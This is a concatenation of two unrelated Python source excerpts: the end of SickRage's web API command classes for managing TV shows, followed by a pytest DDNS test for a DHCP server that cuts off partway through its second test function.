so we can pass it along\n indexer = indexer_result[\'data\'][\'results\'][0][\'indexer\']\n\n # moved the logic check to the end in an attempt to eliminate empty directory being created from previous errors\n show_path = ek(os.path.join, self.location, sanitize_filename(indexer_name))\n\n # don\'t create show dir if config says not to\n if sickbeard.ADD_SHOWS_WO_DIR:\n logger.log(u""Skipping initial creation of "" + show_path + "" due to config.ini setting"")\n else:\n dir_exists = helpers.makeDir(show_path)\n if not dir_exists:\n logger.log(u""API :: Unable to create the folder "" + show_path + "", can\'t add the show"", logger.ERROR)\n return _responds(RESULT_FAILURE, {""path"": show_path},\n ""Unable to create the folder "" + show_path + "", can\'t add the show"")\n else:\n helpers.chmodAsParent(show_path)\n\n sickbeard.showQueueScheduler.action.addShow(\n int(indexer), int(self.indexerid), show_path, default_status=new_status, quality=new_quality,\n flatten_folders=int(self.flatten_folders), lang=self.lang, subtitles=self.subtitles, anime=self.anime,\n scene=self.scene, default_status_after=default_ep_status_after, archive=self.archive_firstmatch\n )\n\n return _responds(RESULT_SUCCESS, {""name"": indexer_name}, indexer_name + "" has been queued to be added"")\n\n\nclass CMD_ShowCache(ApiCall):\n _help = {\n ""desc"": ""Check SickRage\'s cache to see if the images (poster, banner, fanart) for a show are valid"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Check SickRage\'s cache to see if the images (poster, banner, fanart) for a show are valid """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n # TODO: catch if cache dir is missing/invalid.. so it doesn\'t break show/show.cache\n # return {""poster"": 0, ""banner"": 0}\n\n cache_obj = image_cache.ImageCache()\n\n has_poster = 0\n has_banner = 0\n\n if ek(os.path.isfile, cache_obj.poster_path(show_obj.indexerid)):\n has_poster = 1\n if ek(os.path.isfile, cache_obj.banner_path(show_obj.indexerid)):\n has_banner = 1\n\n return _responds(RESULT_SUCCESS, {""poster"": has_poster, ""banner"": has_banner})\n\n\nclass CMD_ShowDelete(ApiCall):\n _help = {\n ""desc"": ""Delete a show in SickRage"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""removefiles"": {\n ""desc"": ""True to delete the files associated with the show, False otherwise. This can not be undone!""\n },\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n self.removefiles, args = self.check_params(args, kwargs, ""removefiles"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Delete a show in SickRage """"""\n error, show = Show.delete(self.indexerid, self.removefiles)\n\n if error:\n return _responds(RESULT_FAILURE, msg=error)\n\n return _responds(RESULT_SUCCESS, msg=\'%s has been queued to be deleted\' % show.name)\n\n\nclass CMD_ShowGetQuality(ApiCall):\n _help = {\n ""desc"": ""Get the quality setting of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the quality setting of a show """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n any_qualities, best_qualities = _map_quality(show_obj.quality)\n\n return _responds(RESULT_SUCCESS, {""initial"": any_qualities, ""archive"": best_qualities})\n\n\nclass CMD_ShowGetPoster(ApiCall):\n _help = {\n ""desc"": ""Get the poster of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the poster a show """"""\n return {\n \'outputType\': \'image\',\n \'image\': ShowPoster(self.indexerid),\n }\n\n\nclass CMD_ShowGetBanner(ApiCall):\n _help = {\n ""desc"": ""Get the banner of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the banner of a show """"""\n return {\n \'outputType\': \'image\',\n \'image\': ShowBanner(self.indexerid),\n }\n\n\nclass CMD_ShowGetNetworkLogo(ApiCall):\n _help = {\n ""desc"": ""Get the network logo of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """"""\n :return: Get the network logo of a show\n """"""\n return {\n \'outputType\': \'image\',\n \'image\': ShowNetworkLogo(self.indexerid),\n }\n\n\nclass CMD_ShowGetFanArt(ApiCall):\n _help = {\n ""desc"": ""Get the fan art of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the fan art of a show """"""\n return {\n \'outputType\': \'image\',\n \'image\': ShowFanArt(self.indexerid),\n }\n\n\nclass CMD_ShowPause(ApiCall):\n _help = {\n ""desc"": ""Pause or un-pause a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""pause"": {""desc"": ""True to pause the show, False otherwise""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n self.pause, args = self.check_params(args, kwargs, ""pause"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Pause or un-pause a show """"""\n error, show = Show.pause(self.indexerid, self.pause)\n\n if error:\n return _responds(RESULT_FAILURE, msg=error)\n\n return _responds(RESULT_SUCCESS, msg=\'%s has been %s\' % (show.name, (\'resumed\', \'paused\')[show.paused]))\n\n\nclass CMD_ShowRefresh(ApiCall):\n _help = {\n ""desc"": ""Refresh a show in SickRage"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Refresh a show in SickRage """"""\n error, show = Show.refresh(self.indexerid)\n\n if error:\n return _responds(RESULT_FAILURE, msg=error)\n\n return _responds(RESULT_SUCCESS, msg=\'%s has queued to be refreshed\' % show.name)\n\n\nclass CMD_ShowSeasonList(ApiCall):\n _help = {\n ""desc"": ""Get the list of seasons of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""sort"": {""desc"": ""Return the seasons in ascending or descending order""}\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n self.sort, args = self.check_params(args, kwargs, ""sort"", ""desc"", False, ""string"", [""asc"", ""desc""])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the list of seasons of a show """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n my_db = db.DBConnection(row_type=""dict"")\n if self.sort == ""asc"":\n sql_results = my_db.select(""SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season ASC"",\n [self.indexerid])\n else:\n sql_results = my_db.select(""SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season DESC"",\n [self.indexerid])\n season_list = [] # a list with all season numbers\n for row in sql_results:\n season_list.append(int(row[""season""]))\n\n return _responds(RESULT_SUCCESS, season_list)\n\n\nclass CMD_ShowSeasons(ApiCall):\n _help = {\n ""desc"": ""Get the list of episodes for one or all seasons of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""season"": {""desc"": ""The season number""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n self.season, args = self.check_params(args, kwargs, ""season"", None, False, ""int"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the list of episodes for one or all seasons of a show """"""\n sho_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not sho_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n my_db = db.DBConnection(row_type=""dict"")\n\n if self.season is None:\n sql_results = my_db.select(\n ""SELECT name, episode, airdate, status, release_name, season, location, file_size, subtitles FROM tv_episodes WHERE showid = ?"",\n [self.indexerid])\n seasons = {}\n for row in sql_results:\n status, quality = Quality.splitCompositeStatus(int(row[""status""]))\n row[""status""] = _get_status_strings(status)\n row[""quality""] = get_quality_string(quality)\n if helpers.tryInt(row[\'airdate\'], 1) > 693595: # 1900\n dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(\n network_timezones.parse_date_time(row[\'airdate\'], sho_obj.airs, sho_obj.network))\n row[\'airdate\'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)\n else:\n row[\'airdate\'] = \'Never\'\n cur_season = int(row[""season""])\n cur_episode = int(row[""episode""])\n del row[""season""]\n del row[""episode""]\n if cur_season not in seasons:\n seasons[cur_season] = {}\n seasons[cur_season][cur_episode] = row\n\n else:\n sql_results = my_db.select(\n ""SELECT name, episode, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND season = ?"",\n [self.indexerid, self.season])\n if len(sql_results) == 0:\n return _responds(RESULT_FAILURE, msg=""Season not found"")\n seasons = {}\n for row in sql_results:\n cur_episode = int(row[""episode""])\n del row[""episode""]\n status, quality = Quality.splitCompositeStatus(int(row[""status""]))\n row[""status""] = _get_status_strings(status)\n row[""quality""] = get_quality_string(quality)\n if helpers.tryInt(row[\'airdate\'], 1) > 693595: # 1900\n dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(\n network_timezones.parse_date_time(row[\'airdate\'], sho_obj.airs, sho_obj.network))\n row[\'airdate\'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)\n else:\n row[\'airdate\'] = \'Never\'\n if cur_episode not in seasons:\n seasons[cur_episode] = {}\n seasons[cur_episode] = row\n\n return _responds(RESULT_SUCCESS, seasons)\n\n\nclass CMD_ShowSetQuality(ApiCall):\n _help = {\n ""desc"": ""Set the quality setting of a show. If no quality is provided, the default user setting is used."",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""initial"": {""desc"": ""The initial quality of the show""},\n ""archive"": {""desc"": ""The archive quality of the show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # this for whatever reason removes hdbluray not sdtv... which is just wrong. reverting to previous code.. plus we didnt use the new code everywhere.\n # self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", _get_quality_map().values()[1:])\n self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"",\n [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""])\n self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"",\n [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"",\n ""hdbluray"", ""fullhdbluray""])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Set the quality setting of a show. If no quality is provided, the default user setting is used. """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n quality_map = {\'sdtv\': Quality.SDTV,\n \'sddvd\': Quality.SDDVD,\n \'hdtv\': Quality.HDTV,\n \'rawhdtv\': Quality.RAWHDTV,\n \'fullhdtv\': Quality.FULLHDTV,\n \'hdwebdl\': Quality.HDWEBDL,\n \'fullhdwebdl\': Quality.FULLHDWEBDL,\n \'hdbluray\': Quality.HDBLURAY,\n \'fullhdbluray\': Quality.FULLHDBLURAY,\n \'unknown\': Quality.UNKNOWN}\n\n # use default quality as a fail-safe\n new_quality = int(sickbeard.QUALITY_DEFAULT)\n i_quality_id = []\n a_quality_id = []\n\n if self.initial:\n for quality in self.initial:\n i_quality_id.append(quality_map[quality])\n if self.archive:\n for quality in self.archive:\n a_quality_id.append(quality_map[quality])\n\n if i_quality_id or a_quality_id:\n new_quality = Quality.combineQualities(i_quality_id, a_quality_id)\n show_obj.quality = new_quality\n\n return _responds(RESULT_SUCCESS,\n msg=show_obj.name + "" quality has been changed to "" + get_quality_string(show_obj.quality))\n\n\nclass CMD_ShowStats(ApiCall):\n _help = {\n ""desc"": ""Get episode statistics for a given show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get episode statistics for a given show """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n # show stats\n episode_status_counts_total = {""total"": 0}\n for status in statusStrings:\n if status in [UNKNOWN, DOWNLOADED, SNATCHED, SNATCHED_PROPER, ARCHIVED]:\n continue\n episode_status_counts_total[status] = 0\n\n # add all the downloaded qualities\n episode_qualities_counts_download = {""total"": 0}\n for statusCode in Quality.DOWNLOADED + Quality.ARCHIVED:\n status, quality = Quality.splitCompositeStatus(statusCode)\n if quality in [Quality.NONE]:\n continue\n episode_qualities_counts_download[statusCode] = 0\n\n # add all snatched qualities\n episode_qualities_counts_snatch = {""total"": 0}\n for statusCode in Quality.SNATCHED + Quality.SNATCHED_PROPER:\n status, quality = Quality.splitCompositeStatus(statusCode)\n if quality in [Quality.NONE]:\n continue\n episode_qualities_counts_snatch[statusCode] = 0\n\n my_db = db.DBConnection(row_type=""dict"")\n sql_results = my_db.select(""SELECT status, season FROM tv_episodes WHERE season != 0 AND showid = ?"",\n [self.indexerid])\n # the main loop that goes through all episodes\n for row in sql_results:\n status, quality = Quality.splitCompositeStatus(int(row[""status""]))\n\n episode_status_counts_total[""total""] += 1\n\n if status in Quality.DOWNLOADED + Quality.ARCHIVED:\n episode_qualities_counts_download[""total""] += 1\n episode_qualities_counts_download[int(row[""status""])] += 1\n elif status in Quality.SNATCHED + Quality.SNATCHED_PROPER:\n episode_qualities_counts_snatch[""total""] += 1\n episode_qualities_counts_snatch[int(row[""status""])] += 1\n elif status == 0: # we don\'t count NONE = 0 = N/A\n pass\n else:\n episode_status_counts_total[status] += 1\n\n # the outgoing container\n episodes_stats = {""downloaded"": {}}\n # turning codes into strings\n for statusCode in episode_qualities_counts_download:\n if statusCode == ""total"":\n episodes_stats[""downloaded""][""total""] = episode_qualities_counts_download[statusCode]\n continue\n status, quality = Quality.splitCompositeStatus(int(statusCode))\n status_string = Quality.qualityStrings[quality].lower().replace("" "", ""_"").replace(""("", """").replace("")"", """")\n episodes_stats[""downloaded""][status_string] = episode_qualities_counts_download[statusCode]\n\n episodes_stats[""snatched""] = {}\n # turning codes into strings\n # and combining proper and normal\n for statusCode in episode_qualities_counts_snatch:\n if statusCode == ""total"":\n episodes_stats[""snatched""][""total""] = episode_qualities_counts_snatch[statusCode]\n continue\n status, quality = Quality.splitCompositeStatus(int(statusCode))\n status_string = Quality.qualityStrings[quality].lower().replace("" "", ""_"").replace(""("", """").replace("")"", """")\n if Quality.qualityStrings[quality] in episodes_stats[""snatched""]:\n episodes_stats[""snatched""][status_string] += episode_qualities_counts_snatch[statusCode]\n else:\n episodes_stats[""snatched""][status_string] = episode_qualities_counts_snatch[statusCode]\n\n # episodes_stats[""total""] = {}\n for statusCode in episode_status_counts_total:\n if statusCode == ""total"":\n episodes_stats[""total""] = episode_status_counts_total[statusCode]\n continue\n status, quality = Quality.splitCompositeStatus(int(statusCode))\n status_string = statusStrings[statusCode].lower().replace("" "", ""_"").replace(""("", """").replace(\n "")"", """")\n episodes_stats[status_string] = episode_status_counts_total[statusCode]\n\n return _responds(RESULT_SUCCESS, episodes_stats)\n\n\nclass CMD_ShowUpdate(ApiCall):\n _help = {\n ""desc"": ""Update a show in SickRage"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Update a show in SickRage """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n try:\n sickbeard.showQueueScheduler.action.updateShow(show_obj, True) # @UndefinedVariable\n return _responds(RESULT_SUCCESS, msg=str(show_obj.name) + "" has queued to be updated"")\n except CantUpdateShowException as e:\n logger.log(u""API::Unable to update show: {0}"".format(str(e)), logger.DEBUG)\n return _responds(RESULT_FAILURE, msg=""Unable to update "" + str(show_obj.name))\n\n\nclass CMD_Shows(ApiCall):\n _help = {\n ""desc"": ""Get all shows in SickRage"",\n ""optionalParameters"": {\n ""sort"": {""desc"": ""The sorting strategy to apply to the list of shows""},\n ""paused"": {""desc"": ""True to include paused shows, False otherwise""},\n },\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.sort, args = self.check_params(args, kwargs, ""sort"", ""id"", False, ""string"", [""id"", ""name""])\n self.paused, args = self.check_params(args, kwargs, ""paused"", None, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get all shows in SickRage """"""\n shows = {}\n for curShow in sickbeard.showList:\n\n if not self.paused and curShow.paused: # If we\'re not including paused shows, and the current show is paused\n continue # continue with the next show\n\n indexer_show = helpers.mapIndexersToShow(curShow)\n\n show_dict = {\n ""paused"": (0, 1)[curShow.paused],\n ""quality"": get_quality_string(curShow.quality),\n ""language"": curShow.lang,\n ""air_by_date"": (0, 1)[curShow.air_by_date],\n ""sports"": (0, 1)[curShow.sports],\n ""anime"": (0, 1)[curShow.anime],\n ""indexerid"": curShow.indexerid,\n ""tvdbid"": indexer_show[1],\n ""network"": curShow.network,\n ""show_name"": curShow.name,\n ""status"": curShow.status,\n ""subtitles"": (0, 1)[curShow.subtitles],\n }\n\n if helpers.tryInt(curShow.nextaired, 1) > 693595: # 1900\n dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(\n network_timezones.parse_date_time(curShow.nextaired, curShow.airs, show_dict[\'network\']))\n show_dict[\'next_ep_airdate\'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)\n else:\n show_dict[\'next_ep_airdate\'] = \'\'\n\n show_dict[""cache""] = CMD_ShowCache((), {""indexerid"": curShow.indexerid}).run()[""data""]\n if not show_dict[""network""]:\n show_dict[""network""] = """"\n if self.sort == ""name"":\n shows[curShow.name] = show_dict\n else:\n shows[curShow.indexerid] = show_dict\n\n return _responds(RESULT_SUCCESS, shows)\n\n\nclass CMD_ShowsStats(ApiCall):\n _help = {""desc"": ""Get the global shows and episodes statistics""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the global shows and episodes statistics """"""\n stats = Show.overall_stats()\n\n return _responds(RESULT_SUCCESS, {\n \'ep_downloaded\': stats[\'episodes\'][\'downloaded\'],\n \'ep_snatched\': stats[\'episodes\'][\'snatched\'],\n \'ep_total\': stats[\'episodes\'][\'total\'],\n \'shows_active\': stats[\'shows\'][\'active\'],\n \'shows_total\': stats[\'shows\'][\'total\'],\n })\n\n\n# WARNING: never define a cmd call string that contains a ""_"" (underscore)\n# this is reserved for cmd indexes used while cmd chaining\n\n# WARNING: never define a param name that contains a ""."" (dot)\n# this is reserved for cmd namespaces used while cmd chaining\nfunction_mapper = {\n ""help"": CMD_Help,\n ""future"": CMD_ComingEpisodes,\n ""episode"": CMD_Episode,\n ""episode.search"": CMD_EpisodeSearch,\n ""episode.setstatus"": CMD_EpisodeSetStatus,\n ""episode.subtitlesearch"": CMD_SubtitleSearch,\n ""exceptions"": CMD_Exceptions,\n ""history"": CMD_History,\n ""history.clear"": CMD_HistoryClear,\n ""history.trim"": CMD_HistoryTrim,\n ""failed"": CMD_Failed,\n ""backlog"": CMD_Backlog,\n ""logs"": CMD_Logs,\n ""sb"": CMD_SickBeard,\n ""postprocess"": CMD_PostProcess,\n ""sb.addrootdir"": CMD_SickBeardAddRootDir,\n ""sb.checkversion"": CMD_SickBeardCheckVersion,\n ""sb.checkscheduler"": CMD_SickBeardCheckScheduler,\n ""sb.deleterootdir"": CMD_SickBeardDeleteRootDir,\n ""sb.getdefaults"": CMD_SickBeardGetDefaults,\n ""sb.getmessages"": CMD_SickBeardGetMessages,\n ""sb.getrootdirs"": CMD_SickBeardGetRootDirs,\n ""sb.pausebacklog"": CMD_SickBeardPauseBacklog,\n ""sb.ping"": CMD_SickBeardPing,\n ""sb.restart"": CMD_SickBeardRestart,\n ""sb.searchindexers"": CMD_SickBeardSearchIndexers,\n ""sb.searchtvdb"": CMD_SickBeardSearchTVDB,\n ""sb.searchtvrage"": CMD_SickBeardSearchTVRAGE,\n ""sb.setdefaults"": CMD_SickBeardSetDefaults,\n ""sb.update"": CMD_SickBeardUpdate,\n ""sb.shutdown"": CMD_SickBeardShutdown,\n ""show"": CMD_Show,\n ""show.addexisting"": CMD_ShowAddExisting,\n ""show.addnew"": CMD_ShowAddNew,\n ""show.cache"": CMD_ShowCache,\n ""show.delete"": CMD_ShowDelete,\n ""show.getquality"": CMD_ShowGetQuality,\n ""show.getposter"": CMD_ShowGetPoster,\n ""show.getbanner"": CMD_ShowGetBanner,\n ""show.getnetworklogo"": CMD_ShowGetNetworkLogo,\n ""show.getfanart"": CMD_ShowGetFanArt,\n ""show.pause"": CMD_ShowPause,\n ""show.refresh"": CMD_ShowRefresh,\n ""show.seasonlist"": CMD_ShowSeasonList,\n ""show.seasons"": CMD_ShowSeasons,\n ""show.setquality"": CMD_ShowSetQuality,\n ""show.stats"": CMD_ShowStats,\n ""show.update"": CMD_ShowUpdate,\n ""shows"": CMD_Shows,\n ""shows.stats"": CMD_ShowsStats\n}\n', '""""""DDNS without TSIG""""""\n\n# pylint: disable=invalid-name,line-too-long\n\nimport pytest\n\nimport misc\nimport srv_control\nimport srv_msg\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_add_success_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_add_fail_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n 